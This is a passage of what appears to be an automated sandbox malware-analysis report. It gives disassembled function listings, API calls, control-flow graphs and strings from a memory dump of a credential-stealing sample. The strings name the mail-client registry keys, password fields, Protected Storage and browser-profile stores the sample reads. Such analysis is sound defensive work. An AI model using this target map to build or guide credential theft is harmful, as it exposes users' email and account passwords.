                                                                                                                                                                                  • Part of subcall function 00410DBB: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 00410DF2
                                                                                                                                                                                • strlen.MSVCRT ref: 00401EA4
                                                                                                                                                                                • strlen.MSVCRT ref: 00401EB2
                                                                                                                                                                                • strlen.MSVCRT ref: 00401EF8
                                                                                                                                                                                • strlen.MSVCRT ref: 00401F06
                                                                                                                                                                                • memset.MSVCRT ref: 00401FB1
                                                                                                                                                                                • atoi.MSVCRT(?), ref: 00401FE0
                                                                                                                                                                                • memset.MSVCRT ref: 00402003
                                                                                                                                                                                • sprintf.MSVCRT ref: 00402030
                                                                                                                                                                                  • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                • memset.MSVCRT ref: 00402086
                                                                                                                                                                                • memset.MSVCRT ref: 0040209B
                                                                                                                                                                                • strlen.MSVCRT ref: 004020A1
                                                                                                                                                                                • strlen.MSVCRT ref: 004020AF
                                                                                                                                                                                • strlen.MSVCRT ref: 004020E2
                                                                                                                                                                                • strlen.MSVCRT ref: 004020F0
                                                                                                                                                                                • memset.MSVCRT ref: 00402018
                                                                                                                                                                                  • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                  • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                                                                                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                                                                                                                                  • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileFolderPathSpecialStrings_mbscatatoisprintf
                                                                                                                                                                                • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                                                                                                • API String ID: 52128907-4223776976
                                                                                                                                                                                • Opcode ID: 0586a96bd1dd566e4e6b01723853c75a2a65919309edaf857d44129f31cda3b9
                                                                                                                                                                                • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                                                                                                                • Opcode Fuzzy Hash: 0586a96bd1dd566e4e6b01723853c75a2a65919309edaf857d44129f31cda3b9
                                                                                                                                                                                • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D
                                                                                                                                                                                Function 004027BE Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 122COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00402869
                                                                                                                                                                                  • Part of subcall function 004029A2: RegQueryValueExA.KERNEL32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,770145ED,?,00000000), ref: 004028A3
                                                                                                                                                                                  • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,770145ED,?,00000000), ref: 0040297B
                                                                                                                                                                                  • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                                                                                                                • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                                                                                                • API String ID: 1497257669-167382505
                                                                                                                                                                                • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                                                                                                • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                                                                                                                                                                • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                                                                                                • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                                                                                                                                                                                Function 0040CF44 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 169COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                                                                                                                  • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                                                                                                                  • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Library$??3@DeleteFreeLoadMessageObject
                                                                                                                                                                                • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                                                                                                                • API String ID: 910260487-375988210
                                                                                                                                                                                • Opcode ID: d6132907f4b3170a7015f464395200ce2fd6d1b2519e675daeb85491024fb36d
                                                                                                                                                                                • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                                                                                                                • Opcode Fuzzy Hash: d6132907f4b3170a7015f464395200ce2fd6d1b2519e675daeb85491024fb36d
                                                                                                                                                                                • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A
                                                                                                                                                                                Function 00403C16 Relevance: 24.7, APIs: 2, Strings: 12, Instructions: 184libraryCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                                                                                                                • LoadLibraryA.KERNEL32(pstorec.dll), ref: 00403C35
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                                                                                                                Strings
                                                                                                                                                                                • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                                                                                                                • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                                                                                                                • PStoreCreateInstance, xrefs: 00403C44
                                                                                                                                                                                • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                                                                                                                • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                                                                                                                • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                                                                                                                • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                                                                                                                • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                                                                                                                • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                                                                                                                • pstorec.dll, xrefs: 00403C30
                                                                                                                                                                                • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                                                                                                                • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Library$FreeLoad_mbscpy
                                                                                                                                                                                • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                                                                                                • API String ID: 3151552205-317895162
                                                                                                                                                                                • Opcode ID: 7553cdf7f2ce1cf444f62a1d2691c4a3b1dbf44d811f574412da19563fe3f526
                                                                                                                                                                                • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                                                                                                                • Opcode Fuzzy Hash: 7553cdf7f2ce1cf444f62a1d2691c4a3b1dbf44d811f574412da19563fe3f526
                                                                                                                                                                                • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699
                                                                                                                                                                                Function 00444C4A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 128COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 262 444c4a-444c66 call 444e38 GetModuleHandleA 265 444c87-444c8a 262->265 266 444c68-444c73 262->266 268 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 265->268 266->265 267 444c75-444c7e 266->267 269 444c80-444c85 267->269 270 444c9f-444ca3 267->270 277 444d02-444d0d __setusermatherr 268->277 278 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 268->278 269->265 272 444c8c-444c93 269->272 270->265 273 444ca5-444ca7 270->273 272->265 275 444c95-444c9d 272->275 276 444cad-444cb0 273->276 275->276 276->268 277->278 281 444da4-444da7 278->281 282 444d6a-444d72 278->282 285 444d81-444d85 281->285 286 444da9-444dad 281->286 283 444d74-444d76 282->283 284 444d78-444d7b 282->284 283->282 283->284 284->285 287 444d7d-444d7e 284->287 288 444d87-444d89 285->288 289 444d8b-444d9c GetStartupInfoA 285->289 286->281 287->285 288->287 288->289 290 444d9e-444da2 289->290 291 444daf-444db1 289->291 292 444db2-444dc6 GetModuleHandleA call 40cf44 290->292 291->292 295 444dcf-444e0f _cexit call 444e71 292->295 296 444dc8-444dc9 exit 292->296 296->295
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                                                • String ID: 2t
                                                                                                                                                                                • API String ID: 3662548030-3527913779
                                                                                                                                                                                • Opcode ID: a2c5e685021b953e45b16df810cc3e629d637f1bb2461c548f2803c140be0595
                                                                                                                                                                                • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                                                                                                                                                                • Opcode Fuzzy Hash: a2c5e685021b953e45b16df810cc3e629d637f1bb2461c548f2803c140be0595
                                                                                                                                                                                • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D
                                                                                                                                                                                Function 0040FB00 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 101registryCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 300 40fb00-40fb35 call 44b090 RegOpenKeyExA 303 40fc37-40fc3d 300->303 304 40fb3b-40fb4f 300->304 306 40fb55-40fb7e RegQueryValueExA 304->306 307 40fc2d-40fc31 RegCloseKey 304->307 308 40fc23-40fc27 RegCloseKey 306->308 309 40fb84-40fb93 call 404734 306->309 307->303 308->307 309->308 312 40fb99-40fbd1 call 4047a5 309->312 312->308 315 40fbd3-40fbdb 312->315 316 40fc19-40fc1d LocalFree 315->316 317 40fbdd-40fc14 memcpy * 2 call 40f802 315->317 316->308 317->316
                                                                                                                                                                                APIs
                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                                                                                                                                                  • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                • memcpy.MSVCRT(?,00456E58,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                                                                                                                                                • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                                                                                                                                                  • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                                                                                                                  • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                                                                                  • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                                                                                • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Close$memcpy$EnumFreeLibraryLoadLocalOpenQueryValuememset
                                                                                                                                                                                • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                                                                                                                                                                                • API String ID: 547501411-2409096184
                                                                                                                                                                                • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                                                                                                                                                • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                                                                                                                                                • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                                                                                                                                                • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A
                                                                                                                                                                                Function 00402C5D Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 104registryCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 319 402c5d-402c81 call 410a9c 322 402da5-402db0 319->322 323 402c87-402cb7 memset call 410b62 319->323 326 402d9c-402d9f RegCloseKey 323->326 327 402cbd-402cbf 323->327 326->322 328 402cc4-402d2d call 410b1e memset sprintf call 410a9c 327->328 333 402d3a-402d6b sprintf call 410a9c 328->333 334 402d2f-402d35 call 402bd1 328->334 338 402d7a-402d8a call 410b62 333->338 339 402d6d-402d75 call 402bd1 333->339 334->333 342 402d8f-402d94 338->342 339->338 342->328 343 402d9a-402d9b 342->343 343->326
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                • memset.MSVCRT ref: 00402C9D
                                                                                                                                                                                  • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402D9F
                                                                                                                                                                                  • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                • memset.MSVCRT ref: 00402CF7
                                                                                                                                                                                • sprintf.MSVCRT ref: 00402D10
                                                                                                                                                                                • sprintf.MSVCRT ref: 00402D4E
                                                                                                                                                                                  • Part of subcall function 00402BD1: memset.MSVCRT ref: 00402BF1
                                                                                                                                                                                  • Part of subcall function 00402BD1: RegCloseKey.ADVAPI32 ref: 00402C55
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Closememset$sprintf$EnumOpen
                                                                                                                                                                                • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                                                                                                                                • API String ID: 1831126014-3814494228
                                                                                                                                                                                • Opcode ID: b1494c850d96e19dfebe9b6e5b972ea39351de22b51df2d3807edb00f3b2aba3
                                                                                                                                                                                • Instruction ID: 079f63aacd2b880b2e0576cff081af09170d207e8fe08998d1b5f7116231a607
                                                                                                                                                                                • Opcode Fuzzy Hash: b1494c850d96e19dfebe9b6e5b972ea39351de22b51df2d3807edb00f3b2aba3
                                                                                                                                                                                • Instruction Fuzzy Hash: C7313072D0011DBADB11DA91CD46FEFB77CAF14345F0404A6BA18B2191E7B8AF849B64
                                                                                                                                                                                Function 004442EA Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0044430B
                                                                                                                                                                                  • Part of subcall function 00410DBB: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 00410DF2
                                                                                                                                                                                  • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                                                                                                  • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                                                                                                  • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                                                                                                  • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                                                                                                  • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                                                                                  • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                                                                • memset.MSVCRT ref: 00444379
                                                                                                                                                                                • memset.MSVCRT ref: 00444394
                                                                                                                                                                                  • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                                                                                                                • strlen.MSVCRT ref: 004443DB
                                                                                                                                                                                • _strcmpi.MSVCRT ref: 00444401
                                                                                                                                                                                Strings
                                                                                                                                                                                • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                                                                                                                • Store Root, xrefs: 004443A5
                                                                                                                                                                                • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                                                                                                                • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$strlen$Close$EnvironmentExpandFolderPathSpecialStrings_mbscat_mbscpy_strcmpi
                                                                                                                                                                                • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                                                                                                • API String ID: 1502082548-2578778931
                                                                                                                                                                                • Opcode ID: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                                                                                                                                                                                • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                                                                                                                • Opcode Fuzzy Hash: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                                                                                                                                                                                • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A
                                                                                                                                                                                Function 0040F460 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 180registryCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 365 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 370 40f5c3-40f5ea RegQueryValueExA 365->370 371 40f6d9-40f6df 365->371 372 40f6d0-40f6d3 RegCloseKey 370->372 373 40f5f0-40f5f4 370->373 372->371 373->372 374 40f5fa-40f604 373->374 375 40f606-40f618 call 40466b call 404734 374->375 376 40f677 374->376 385 40f66a-40f675 call 404785 375->385 386 40f61a-40f63e call 4047a5 375->386 377 40f67a-40f67d 376->377 377->372 379 40f67f-40f6bf call 4012ee RegQueryValueExA 377->379 379->372 387 40f6c1-40f6cf 379->387 385->377 386->385 392 40f640-40f643 386->392 387->372 393 40f661-40f664 LocalFree 392->393 394 40f645-40f65a memcpy 392->394 393->385 394->393
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040F567
                                                                                                                                                                                • memset.MSVCRT ref: 0040F57F
                                                                                                                                                                                  • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                                                                                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                                                  • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                                                                                                                • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: QueryValuememset$CloseFreeLibraryLoadLocalOpen_mbscpy_mbsnbcatmemcpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4271961475-3916222277
                                                                                                                                                                                • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                                                                                                                • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                                                                                                                                • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                                                                                                                • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                                                                                                                                                Function 004037CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 395 4037ca-40381c memset * 2 call 444551 398 4038e2-4038e5 395->398 399 403822-403882 call 4021b6 call 406f06 * 2 strchr 395->399 406 403884-403895 _mbscpy 399->406 407 403897-4038a2 strlen 399->407 408 4038bf-4038dd _mbscpy call 4023e5 406->408 407->408 409 4038a4-4038bc sprintf 407->409 408->398 409->408
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 004037EB
                                                                                                                                                                                • memset.MSVCRT ref: 004037FF
                                                                                                                                                                                  • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                                                                                                  • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                                                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                • strchr.MSVCRT ref: 0040386E
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                                                                                                                • strlen.MSVCRT ref: 00403897
                                                                                                                                                                                • sprintf.MSVCRT ref: 004038B7
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                                                                                                                • String ID: %s@yahoo.com
                                                                                                                                                                                • API String ID: 317221925-3288273942
                                                                                                                                                                                • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                                                                                                                                • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                                                                                                                                                • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                                                                                                                                • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                                                                                                                                                                Function 004036E5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67stringCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
